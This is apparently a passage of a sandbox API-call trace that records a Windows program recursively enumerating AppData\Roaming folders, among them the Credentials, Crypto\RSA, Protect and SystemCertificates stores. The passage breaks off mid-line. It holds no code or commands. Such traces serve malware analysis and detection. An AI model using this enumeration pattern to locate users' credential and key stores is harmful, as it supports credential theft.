[0231.211] lstrcmpiW (lpString1="Identities", lpString2=".") returned 1 [0231.211] lstrcmpiW (lpString1="Identities", lpString2="..") returned 1 [0231.211] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Identities\\\\*", lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 0x309ea0 [0231.212] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.212] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.212] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.212] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.212] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.212] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0231.212] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0231.212] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Identities\\\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.212] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.212] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.212] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.212] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.212] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.212] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.212] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 0 [0231.212] FindClose (in: hFindFile=0x309ea0 | out: hFindFile=0x309ea0) returned 1 [0231.212] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 1 [0231.212] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0231.212] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0231.212] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\*", lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 0x309ea0 [0231.342] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.342] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.342] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.342] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0231.342] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0231.342] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Credentials\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.343] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.343] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.343] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.343] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.343] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.343] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.343] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.343] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0231.343] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0231.343] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Crypto\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.344] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.344] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.344] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.344] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.344] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.344] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1 [0231.344] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1 [0231.344] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Crypto\\\\RSA\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0231.344] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.344] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.344] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.344] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.344] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0231.344] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0231.344] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.344] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.344] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.344] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0231.344] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0231.344] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Internet Explorer\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.344] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.345] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.345] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.345] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.345] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.345] lstrcmpiW (lpString1="Quick Launch", lpString2=".") returned 1 [0231.345] lstrcmpiW (lpString1="Quick Launch", lpString2="..") returned 1 [0231.345] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Internet Explorer\\\\Quick Launch\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0231.523] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.523] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.523] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.523] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.523] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.523] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.524] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.524] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.524] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0231.524] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0231.524] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.524] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.524] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.524] lstrcmpiW (lpString1="Protect", lpString2=".") returned 1 [0231.524] lstrcmpiW (lpString1="Protect", lpString2="..") returned 1 [0231.524] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Protect\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.525] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.525] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.525] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.525] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.525] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.525] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.525] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0231.525] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0231.525] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Protect\\\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0231.642] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.642] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.642] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.642] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.642] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.642] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.642] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0231.642] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0231.643] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.643] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.643] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.643] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1 [0231.643] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1 [0231.643] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.643] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.643] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.643] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.643] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.643] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.643] lstrcmpiW (lpString1="My", lpString2=".") returned 1 [0231.643] lstrcmpiW (lpString1="My", lpString2="..") returned 1 [0231.643] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0231.644] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.644] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.644] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.644] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.644] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.644] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0231.644] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0231.644] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\Certificates\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0231.644] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.644] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0231.644] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.644] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.644] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0231.644] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0231.644] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.644] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1 [0231.644] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1 [0231.644] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0231.645] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.645] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0231.645] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.645] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.645] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0231.645] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0231.645] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.645] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1 [0231.645] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1 [0231.645] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CTLs\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0231.645] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.645] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0231.645] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.645] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.645] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0231.645] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0231.645] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0231.645] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0231.645] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.645] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.645] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.645] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0231.645] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0231.645] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0232.723] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.723] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.723] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.723] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.723] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.723] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.723] lstrcmpiW (lpString1="IECompatCache", lpString2=".") returned 1 [0232.724] lstrcmpiW (lpString1="IECompatCache", lpString2="..") returned 1 [0232.724] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\IECompatCache\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0232.724] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.724] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.724] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.724] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.724] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.725] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0232.725] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0232.725] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.725] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.725] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0232.725] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0232.725] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Libraries\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0232.863] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.863] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.863] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.863] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.863] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.863] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.863] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.863] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.864] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.864] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0232.864] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0232.864] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.864] lstrcmpiW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0232.864] lstrcmpiW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0232.864] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Network Shortcuts\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0232.865] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.865] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.865] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.865] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.865] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0232.865] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0232.865] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.865] lstrcmpiW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0232.865] lstrcmpiW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0232.865] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Printer Shortcuts\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0232.865] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.865] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.865] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.865] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.865] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0232.865] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0232.866] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.866] lstrcmpiW (lpString1="PrivacIE", lpString2=".") returned 1 [0232.866] lstrcmpiW (lpString1="PrivacIE", lpString2="..") returned 1 [0232.866] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\PrivacIE\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0232.866] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.866] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.866] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.867] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.867] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.867] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0232.867] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0232.867] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.867] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0232.867] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0232.867] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0232.868] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.868] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.868] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.868] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.868] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.868] lstrcmpiW (lpString1="AutomaticDestinations", lpString2=".") returned 1 [0232.868] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="..") returned 1 [0232.868] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0232.868] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.868] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0232.868] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.868] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.868] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0232.868] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0232.868] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0232.868] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.868] lstrcmpiW (lpString1="CustomDestinations", lpString2=".") returned 1 [0232.869] lstrcmpiW (lpString1="CustomDestinations", lpString2="..") returned 1 [0232.869] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0232.870] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0232.870] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0232.870] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0232.870] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0232.870] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0232.870] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0232.870] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0232.870] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0232.870] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0232.871] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0232.871] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0232.871] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0232.871] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0232.871] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0232.871] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0232.871] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\SendTo\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0233.024] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.024] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0233.025] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0233.025] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: 